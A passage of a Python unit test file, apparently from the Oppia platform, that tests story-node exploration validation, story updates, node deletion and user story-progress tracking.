self.TOPIC_ID, self.STORY_ID, self.user_id_admin)
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': 'invalid_exp_id'
})]
with self.assertRaisesRegexp(
Exception, 'Expected story to only reference valid explorations'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
def test_validate_exploration_throws_an_exception(self):
observed_log_messages = []
def _mock_logging_function(msg):
"""Mocks logging.exception()."""
observed_log_messages.append(msg)
def _mock_validate_function(_exploration, _strict):
"""Mocks logging.exception()."""
raise Exception('Error in exploration')
logging_swap = self.swap(logging, 'exception', _mock_logging_function)
validate_fn_swap = self.swap(
exp_services, 'validate_exploration_for_story',
_mock_validate_function)
with logging_swap, validate_fn_swap:
self.save_new_valid_exploration(
'exp_id_1', self.user_id_a, title='title',
category='Category 1', correctness_feedback_enabled=True)
self.publish_exploration(self.user_id_a, 'exp_id_1')
with self.assertRaisesRegexp(
Exception, 'Error in exploration'):
story_services.validate_explorations_for_story(
['exp_id_1'], False)
self.assertItemsEqual(
observed_log_messages, [
'Exploration validation failed for exploration with '
'ID: exp_id_1. Error: Error in exploration'])
def test_validate_exploration_returning_error_messages(self):
topic_services.publish_story(
self.TOPIC_ID, self.STORY_ID, self.user_id_admin)
self.save_new_valid_exploration(
'exp_id_1', self.user_id_a, title='title', category='Category 1',
correctness_feedback_enabled=True)
validation_error_messages = (
story_services.validate_explorations_for_story(
['invalid_exp', 'exp_id_1'], False))
message_1 = (
'Expected story to only reference valid explorations, but found '
'a reference to an invalid exploration with ID: invalid_exp')
message_2 = (
'Exploration with ID exp_id_1 is not public. Please publish '
'explorations before adding them to a story.'
)
self.assertEqual(validation_error_messages, [message_1, message_2])
def test_cannot_update_story_with_private_exploration_id(self):
topic_services.publish_story(
self.TOPIC_ID, self.STORY_ID, self.user_id_admin)
self.save_new_valid_exploration(
'exp_id_1', self.user_id_a, title='title', category='Category 1',
correctness_feedback_enabled=True)
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': 'exp_id_1'
})]
with self.assertRaisesRegexp(
Exception, 'Exploration with ID exp_id_1 is not public'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
def test_cannot_update_story_with_blank_exp_id(self):
topic_services.publish_story(
self.TOPIC_ID, self.STORY_ID, self.user_id_admin)
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': self.EXP_ID,
'new_value': None
})]
with self.assertRaisesRegexp(
Exception, 'Story node with id node_1 does not contain an '
'exploration id.'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
def test_cannot_update_story_with_exps_with_different_categories(self):
topic_services.publish_story(
self.TOPIC_ID, self.STORY_ID, self.user_id_admin)
self.save_new_valid_exploration(
'exp_id_1', self.user_id_a, title='title', category='Category 1',
correctness_feedback_enabled=True)
self.publish_exploration(self.user_id_a, 'exp_id_1')
self.save_new_valid_exploration(
'exp_id_2', self.user_id_a, title='title', category='Category 2',
correctness_feedback_enabled=True)
self.publish_exploration(self.user_id_a, 'exp_id_2')
change_list = [
story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': self.NODE_ID_2,
'title': 'Title 2'
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': 'exp_id_1'
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_DESTINATION_NODE_IDS),
'node_id': 'node_1',
'old_value': [],
'new_value': ['node_2']
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_2,
'old_value': None,
'new_value': 'exp_id_2'
})
]
validation_error_messages = (
story_services.validate_explorations_for_story(
['exp_id_2', 'exp_id_1'], False))
self.assertEqual(
validation_error_messages, [
'All explorations in a story should be of the same category. '
'The explorations with ID exp_id_2 and exp_id_1 have different '
'categories.'])
with self.assertRaisesRegexp(
Exception, 'All explorations in a story should be of the '
'same category'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
def test_cannot_update_story_with_exps_with_other_languages(self):
topic_services.publish_story(
self.TOPIC_ID, self.STORY_ID, self.user_id_admin)
self.save_new_valid_exploration(
'exp_id_1', self.user_id_a, title='title', category='Category 1',
language_code='es', correctness_feedback_enabled=True)
self.publish_exploration(self.user_id_a, 'exp_id_1')
change_list = [
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': 'exp_id_1'
})
]
validation_error_messages = (
story_services.validate_explorations_for_story(['exp_id_1'], False))
self.assertEqual(
validation_error_messages, [
'Invalid language es found for exploration with ID exp_id_1.'])
with self.assertRaisesRegexp(
Exception, 'Invalid language es found for exploration with '
'ID exp_id_1'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
def test_cannot_update_story_with_exps_without_correctness_feedback(self):
topic_services.publish_story(
self.TOPIC_ID, self.STORY_ID, self.user_id_admin)
self.save_new_valid_exploration(
'exp_id_1', self.user_id_a, title='title', category='Category 1',
language_code='en')
self.publish_exploration(self.user_id_a, 'exp_id_1')
change_list = [
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': 'exp_id_1'
})
]
validation_error_messages = (
story_services.validate_explorations_for_story(['exp_id_1'], False))
self.assertEqual(
validation_error_messages, [
'Expected all explorations to have correctness feedback '
'enabled. Invalid exploration: exp_id_1'])
with self.assertRaisesRegexp(
Exception, 'Expected all explorations to have correctness feedback '
'enabled. Invalid exploration: exp_id_1'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
def test_cannot_update_story_with_exps_with_invalid_interactions(self):
topic_services.publish_story(
self.TOPIC_ID, self.STORY_ID, self.user_id_admin)
self.save_new_valid_exploration(
'exp_id_1', self.user_id_a, title='title', category='Category 1',
interaction_id='LogicProof', correctness_feedback_enabled=True)
self.publish_exploration(self.user_id_a, 'exp_id_1')
change_list = [
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': 'exp_id_1'
})
]
validation_error_messages = (
story_services.validate_explorations_for_story(['exp_id_1'], False))
self.assertEqual(
validation_error_messages, [
'Invalid interaction LogicProof in exploration with ID: '
'exp_id_1.'])
with self.assertRaisesRegexp(
Exception, 'Invalid interaction LogicProof in exploration with '
'ID: exp_id_1'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
def test_cannot_update_story_with_exps_with_recommended_exps(self):
topic_services.publish_story(
self.TOPIC_ID, self.STORY_ID, self.user_id_admin)
self.save_new_valid_exploration(
'exp_id_1', self.user_id_a, title='title', category='Category 1',
interaction_id='TextInput', end_state_name='End',
correctness_feedback_enabled=True)
self.publish_exploration(self.user_id_a, 'exp_id_1')
exp_services.update_exploration(
self.user_id_a, 'exp_id_1', [exp_domain.ExplorationChange({
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': (
exp_domain.STATE_PROPERTY_INTERACTION_CUST_ARGS),
'state_name': 'End',
'new_value': {
'recommendedExplorationIds': {
'value': ['1', '2']
}
}
})], 'Updated State Content')
change_list = [
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': 'exp_id_1'
})
]
validation_error_messages = (
story_services.validate_explorations_for_story(['exp_id_1'], False))
self.assertEqual(
validation_error_messages, [
'Exploration with ID: exp_id_1 contains exploration '
'recommendations in its EndExploration interaction.'])
with self.assertRaisesRegexp(
Exception, 'Exploration with ID: exp_id_1 contains exploration '
'recommendations in its EndExploration interaction.'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
def test_cannot_update_story_with_exps_with_invalid_rte_content(self):
topic_services.publish_story(
self.TOPIC_ID, self.STORY_ID, self.user_id_admin)
self.save_new_valid_exploration(
'exp_id_1', self.user_id_a, title='title', category='Category 1',
end_state_name='End', correctness_feedback_enabled=True)
self.publish_exploration(self.user_id_a, 'exp_id_1')
exp_services.update_exploration(
self.user_id_a, 'exp_id_1', [exp_domain.ExplorationChange({
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'Introduction',
'new_value': {
'content_id': 'content',
'html': (
'<oppia-noninteractive-collapsible content-with-value='
'"&quot;&lt;p&gt;Hello&lt;/p&gt;'
'&quot;" heading-with-value="&quot;'
'SubCollapsible&quot;">'
'</oppia-noninteractive-collapsible>')
}
})],
'Updated State Content.')
change_list = [
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': 'exp_id_1'
})
]
validation_error_messages = (
story_services.validate_explorations_for_story(['exp_id_1'], False))
self.assertEqual(
validation_error_messages, [
'RTE content in state Introduction of exploration with '
'ID exp_id_1 is not supported on mobile.'])
with self.assertRaisesRegexp(
Exception, 'RTE content in state Introduction of exploration with '
'ID exp_id_1 is not supported on mobile.'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
def test_cannot_update_story_with_exps_with_parameter_values(self):
topic_services.publish_story(
self.TOPIC_ID, self.STORY_ID, self.user_id_admin)
self.save_new_valid_exploration(
'exp_id_1', self.user_id_a, title='title', category='Category 1',
correctness_feedback_enabled=True)
exp_services.update_exploration(
self.user_id_a, 'exp_id_1', [exp_domain.ExplorationChange({
'cmd': exp_domain.CMD_EDIT_EXPLORATION_PROPERTY,
'property_name': 'param_specs',
'new_value': {
'theParameter':
param_domain.ParamSpec('UnicodeString').to_dict()
}
})],
'')
self.publish_exploration(self.user_id_a, 'exp_id_1')
change_list = [
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': 'exp_id_1'
})
]
validation_error_messages = (
story_services.validate_explorations_for_story(['exp_id_1'], False))
self.assertEqual(
validation_error_messages, [
'Expected no exploration to have parameter values in'
' it. Invalid exploration: exp_id_1'])
with self.assertRaisesRegexp(
Exception, 'Expected no exploration to have parameter values in'
' it. Invalid exploration: exp_id_1'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
self.save_new_valid_exploration(
'exp_id_2', self.user_id_a, title='title 2', category='Category 1',
interaction_id='LogicProof', correctness_feedback_enabled=True)
exp_services.update_exploration(
self.user_id_a, 'exp_id_2', [exp_domain.ExplorationChange({
'cmd': exp_domain.CMD_EDIT_EXPLORATION_PROPERTY,
'property_name': 'param_specs',
'new_value': {
'param1':
param_domain.ParamSpec('UnicodeString').to_dict()
}
}), exp_domain.ExplorationChange({
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_PARAM_CHANGES,
'state_name': feconf.DEFAULT_INIT_STATE_NAME,
'new_value': [
param_domain.ParamChange('param1', 'Copier', {}).to_dict()]
})],
'')
self.publish_exploration(self.user_id_a, 'exp_id_2')
change_list = [
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': 'exp_id_1',
'new_value': 'exp_id_2'
})
]
with self.assertRaisesRegexp(
Exception, 'Expected no exploration to have parameter values in'
' it. Invalid exploration: exp_id_2'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
def test_cannot_update_story_with_mismatch_of_story_versions(self):
self.save_new_default_exploration(
'exp_id', self.user_id_a, title='title')
self.publish_exploration(self.user_id_a, 'exp_id')
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': 'exp_id'
})]
story_model = story_models.StoryModel.get(self.STORY_ID)
story_model.version = 0
story_model.commit(self.user_id_a, 'Changed version', [])
with self.assertRaisesRegexp(
Exception,
'Unexpected error: trying to update version 1 of story '
'from version 2. Please reload the page and try again.'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
story_model = story_models.StoryModel.get(self.STORY_ID)
story_model.version = 10
story_model.commit(self.user_id_a, 'Changed version', [])
with self.assertRaisesRegexp(
Exception,
'Trying to update version 11 of story from version 2, '
'which is too old. Please reload the page and try again.'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
def test_get_story_by_version(self):
topic_id = topic_fetchers.get_new_topic_id()
story_id = story_services.get_new_story_id()
self.save_new_topic(
topic_id, self.USER_ID, name='A different topic',
abbreviated_name='different-topic', url_fragment='different-topic',
description='A new topic',
canonical_story_ids=[], additional_story_ids=[],
uncategorized_skill_ids=[], subtopics=[],
next_subtopic_id=0)
self.save_new_story(
story_id, self.USER_ID, topic_id, title='new title')
topic_services.add_canonical_story(self.USER_ID, topic_id, story_id)
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_PROPERTY,
'property_name': story_domain.STORY_PROPERTY_LANGUAGE_CODE,
'old_value': 'en',
'new_value': 'bn'
})]
story_services.update_story(
self.USER_ID, story_id, change_list,
'Updated story language_code.')
story_v1 = story_fetchers.get_story_by_id(story_id, version=1)
story_v2 = story_fetchers.get_story_by_id(story_id, version=2)
self.assertEqual(story_v1.language_code, 'en')
self.assertEqual(story_v2.language_code, 'bn')
def test_cannot_update_initial_node_with_invalid_node_id(self):
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_CONTENTS_PROPERTY,
'property_name': story_domain.INITIAL_NODE_ID,
'old_value': '',
'new_value': 'new_initial_node_id'
})]
with self.assertRaisesRegexp(
Exception,
'The node with id new_initial_node_id is not part of this story'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Updated story initial_node_id.')
def test_rearrange_node_in_story(self):
changelist = [
story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': self.NODE_ID_2,
'title': 'Title 2'
})
]
story_services.update_story(
self.USER_ID, self.STORY_ID, changelist, 'Added story node.')
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(story.story_contents.nodes[0].id, self.NODE_ID_1)
self.assertEqual(story.story_contents.nodes[1].id, self.NODE_ID_2)
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_CONTENTS_PROPERTY,
'property_name': story_domain.NODE,
'old_value': 1,
'new_value': 0
})]
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Added story node.')
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(story.story_contents.nodes[0].id, self.NODE_ID_2)
self.assertEqual(story.story_contents.nodes[1].id, self.NODE_ID_1)
def test_cannot_update_node_exploration_id_with_invalid_node_id(self):
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID,
'node_id': 'invalid_node',
'old_value': '',
'new_value': 'exp_id'
})]
with self.assertRaisesRegexp(
Exception,
'The node with id invalid_node is not part of this story'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Updated story node_exploration_id.')
def test_cannot_update_node_exploration_id_with_existing_exploration_id(
self):
self.save_new_default_exploration(
'exp_id', self.user_id_a, title='title')
self.publish_exploration(self.user_id_a, 'exp_id')
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': 'exp_id'
})]
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
change_list = [
story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': self.NODE_ID_2,
'title': 'Title 2'
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_DESTINATION_NODE_IDS),
'node_id': self.NODE_ID_1,
'old_value': [],
'new_value': [self.NODE_ID_2]
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_2,
'old_value': None,
'new_value': 'exp_id'
})
]
with self.assertRaisesRegexp(
Exception,
'A node with exploration id exp_id already exists.'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Updated story node_exploration_id.')
def test_cannot_update_destination_node_ids_with_invalid_node_id(self):
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_DESTINATION_NODE_IDS),
'node_id': 'invalid_node',
'old_value': [],
'new_value': []
})]
with self.assertRaisesRegexp(
Exception,
'The node with id invalid_node is not part of this story'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Updated story new_destination_node_ids.')
def test_cannot_update_new_prerequisite_skill_ids_with_invalid_node_id(
self):
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_PREREQUISITE_SKILL_IDS),
'node_id': 'invalid_node',
'old_value': [],
'new_value': []
})]
with self.assertRaisesRegexp(
Exception,
'The node with id invalid_node is not part of this story'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Updated story new_prerequisite_skill_ids.')
def test_cannot_mark_node_outline_as_unfinalized_with_invalid_node_id(self):
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_OUTLINE_STATUS,
'node_id': 'invalid_node',
'old_value': '',
'new_value': ''
})]
with self.assertRaisesRegexp(
Exception,
'The node with id invalid_node is not part of this story'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Mark node outline as unfinalized.')
def test_cannot_mark_node_outline_as_finalized_with_invalid_node_id(self):
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_OUTLINE_STATUS,
'node_id': 'invalid_node',
'old_value': '',
'new_value': 'new_value'
})]
with self.assertRaisesRegexp(
Exception,
'The node with id invalid_node is not part of this story'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Mark node outline as finalized.')
def test_cannot_update_node_title_with_invalid_node_id(self):
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': story_domain.STORY_NODE_PROPERTY_TITLE,
'node_id': 'invalid_node',
'old_value': '',
'new_value': 'new_title'
})]
with self.assertRaisesRegexp(
Exception,
'The node with id invalid_node is not part of this story'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Update node title.')
def test_cannot_update_node_description_with_invalid_node_id(self):
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': story_domain.STORY_NODE_PROPERTY_DESCRIPTION,
'node_id': 'invalid_node',
'old_value': '',
'new_value': 'new_description'
})]
with self.assertRaisesRegexp(
Exception,
'The node with id invalid_node is not part of this story'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Update node description.')
def test_cannot_update_node_thumbnail_filename_with_invalid_node_id(self):
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_THUMBNAIL_FILENAME),
'node_id': 'invalid_node',
'old_value': '',
'new_value': 'new_image.svg'
})]
with self.assertRaisesRegexp(
Exception,
'The node with id invalid_node is not part of this story'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Update node thumbnail filename.')
def test_cannot_update_node_thumbnail_bg_color_with_invalid_node_id(self):
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_THUMBNAIL_BG_COLOR),
'node_id': 'invalid_node',
'old_value': '',
'new_value': '#F8BF74'
})]
with self.assertRaisesRegexp(
Exception,
'The node with id invalid_node is not part of this story'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Update node thumbnail bg color.')
def test_cannot_delete_node_with_invalid_node_id(self):
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_DELETE_STORY_NODE,
'node_id': 'invalid_node'
})]
with self.assertRaisesRegexp(
Exception,
'The node with id invalid_node is not part of this story'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Delete node.')
def test_cannot_delete_starting_node_of_story(self):
changelist = [
story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': self.NODE_ID_2,
'title': 'Title 2'
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_DESTINATION_NODE_IDS),
'node_id': self.NODE_ID_2,
'old_value': [],
'new_value': [self.NODE_ID_1]
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_OUTLINE_STATUS,
'node_id': self.NODE_ID_2,
'old_value': False,
'new_value': True
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_CONTENTS_PROPERTY,
'property_name': (
story_domain.INITIAL_NODE_ID),
'old_value': self.NODE_ID_1,
'new_value': self.NODE_ID_2
})
]
story_services.update_story(
self.USER_ID, self.STORY_ID, changelist, 'Added node.')
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_DELETE_STORY_NODE,
'node_id': self.NODE_ID_2
})]
with self.assertRaisesRegexp(
Exception,
'The node with id %s is the starting node for the story, '
'change the starting node before deleting it.' % self.NODE_ID_2):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Delete node.')
def test_delete_initial_node(self):
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(
story.story_contents.initial_node_id, self.NODE_ID_1)
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_DELETE_STORY_NODE,
'node_id': self.NODE_ID_1
})]
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Delete node.')
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertIsNone(story.story_contents.initial_node_id)
class StoryProgressUnitTests(test_utils.GenericTestBase):
"""Tests functions which deal with any progress a user has made within a
story, including query and recording methods related to nodes
which are completed in the context of the story.
"""
    def _get_progress_model(self, user_id, story_id):
        """Returns the StoryProgressModel corresponding to the story id and
        user id.
        """
        return user_models.StoryProgressModel.get(
            user_id, story_id, strict=False)
    def _record_completion(self, user_id, story_id, node_id):
        """Records the completion of a node in the context of a story."""
        story_services.record_completed_node_in_story_context(
            user_id, story_id, node_id)
def setUp(self):
super(StoryProgressUnitTests, self).setUp()
self.STORY_1_ID = 'story_id'
self.STORY_ID_1 = 'story_id_1'
self.NODE_ID_1 = 'node_1'
self.NODE_ID_2 = 'node_2'
self.NODE_ID_3 = 'node_3'
self.NODE_ID_4 = 'node_4'
self.USER_ID = 'user'
self.owner_id = 'owner'
self.TOPIC_ID = topic_fetchers.get_new_topic_id()
self.save_new_topic(
self.TOPIC_ID, self.USER_ID, name='New Topic',
abbreviated_name='topic-two', url_fragment='topic-two',
description='A new topic',
canonical_story_ids=[], additional_story_ids=[],
uncategorized_skill_ids=[], subtopics=[],
next_subtopic_id=0)
story = story_domain.Story.create_default_story(
self.STORY_1_ID, 'Title', 'Description', self.TOPIC_ID, 'title')
self.node_1 = {
'id': self.NODE_ID_1,
'thumbnail_filename': 'image.svg',
'thumbnail_bg_color': constants.ALLOWED_THUMBNAIL_BG_COLORS[
'chapter'][0],
'thumbnail_size_in_bytes': 21131,
'title': 'Title 1',
'description': 'Description 1',
'destination_node_ids': ['node_2'],
'acquired_skill_ids': [],
'prerequisite_skill_ids': [],
'outline': '',
'outline_is_finalized': False,
'exploration_id': None
}
self.node_2 = {
'id': self.NODE_ID_2,
'thumbnail_filename': 'image.svg',
'thumbnail_bg_color': constants.ALLOWED_THUMBNAIL_BG_COLORS[
'chapter'][0],
'thumbnail_size_in_bytes': 21131,
'title': 'Title 2',
'description': 'Description 2',
'destination_node_ids': ['node_3'],
'acquired_skill_ids': [],
'prerequisite_skill_ids': [],
'outline': '',
'outline_is_finalized': False,
'exploration_id': None
}
self.node_3 = {
'id': self.NODE_ID_3,
'thumbnail_filename': 'image.svg',
'thumbnail_bg_color': constants.ALLOWED_THUMBNAIL_BG_COLORS[
'chapter'][0],
'thumbnail_size_in_bytes': 21131,
'title': 'Title 3',
'description': 'Description 3',
'destination_node_ids': ['node_4'],
'acquired_skill_ids': [],
'prerequisite_skill_ids': [],
'outline': '',
'outline_is_finalized': False,
'exploration_id': None
}
self.node_4 = {
'id': self.NODE_ID_4,
'thumbnail_filename': 'image.svg',
'thumbnail_bg_color': constants.ALLOWED_THUMBNAIL_BG_COLORS[
'chapter'][0],
'thumbnail_size_in_bytes': 21131,
'title': 'Title 4',
'description': 'Description 4',
'destination_node_ids': [],
'acquired_skill_ids': [],
'prerequisite_skill_ids': [],
'outline': '',
'outline_is_finalized': False,
'exploration_id': None
}
story.story_contents.nodes = [
story_domain.StoryNode.from_dict(self.node_1),
story_domain.StoryNode.from_dict(self.node_2),
story_domain.StoryNode.from_dict(self.node_3),
story_domain.StoryNode.from_dict(self.node_4)
]
self.nodes = story.story_contents.nodes
story.story_contents.initial_node_id = 'node_1'
story.story_contents.next_node_id = 'node_5'
story_services.save_new_story(self.USER_ID, story)
topic_services.add_canonical_story(
self.USER_ID, self.TOPIC_ID, story.id)
def test_get_completed_node_ids(self):
# There should be no exception if the user or story do not exist;
# it should also return an empty list in both of these situations.
self.assertEqual(story_fetchers.get_completed_node_ids(
'Fake', self.STORY_1_ID), [])
self.assertEqual(story_fetchers.get_completed_node_ids(
self.owner_id, 'Fake'), [])
# If no model exists, there should be no completed node IDs.
self.assertIsNone(
self._get_progress_model(self.owner_id, self.STORY_1_ID))
self.assertEqual(story_fetchers.get_completed_node_ids(
self.owner_id, self.STORY_1_ID), [])
# If the first node is completed, it should be reported.
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_1)
self.assertEqual(story_fetchers.get_completed_node_ids(
self.owner_id, self.STORY_1_ID), [self.NODE_ID_1])
# If all nodes are completed, all of them should be reported.
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_2)
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_3)
self.assertEqual(
story_fetchers.get_completed_node_ids(
self.owner_id, self.STORY_1_ID),
[self.NODE_ID_1, self.NODE_ID_2, self.NODE_ID_3])
def test_get_latest_completed_node_ids(self):
self.assertIsNone(
self._get_progress_model(self.owner_id, self.STORY_1_ID))
self.assertEqual(story_fetchers.get_latest_completed_node_ids(
self.owner_id, self.STORY_1_ID), [])
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_1)
self.assertEqual(
story_fetchers.get_latest_completed_node_ids(
self.owner_id, self.STORY_1_ID),
[self.NODE_ID_1])
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_2)
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_3)
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_4)
self.assertEqual(
story_fetchers.get_latest_completed_node_ids(
self.owner_id, self.STORY_1_ID),
[self.NODE_ID_2, self.NODE_ID_3, self.NODE_ID_4])
def test_get_latest_completed_node_ids_different_completion_order(self):
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_4)
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_3)
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_1)
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_2)
self.assertEqual(
story_fetchers.get_latest_completed_node_ids(
self.owner_id, self.STORY_1_ID),
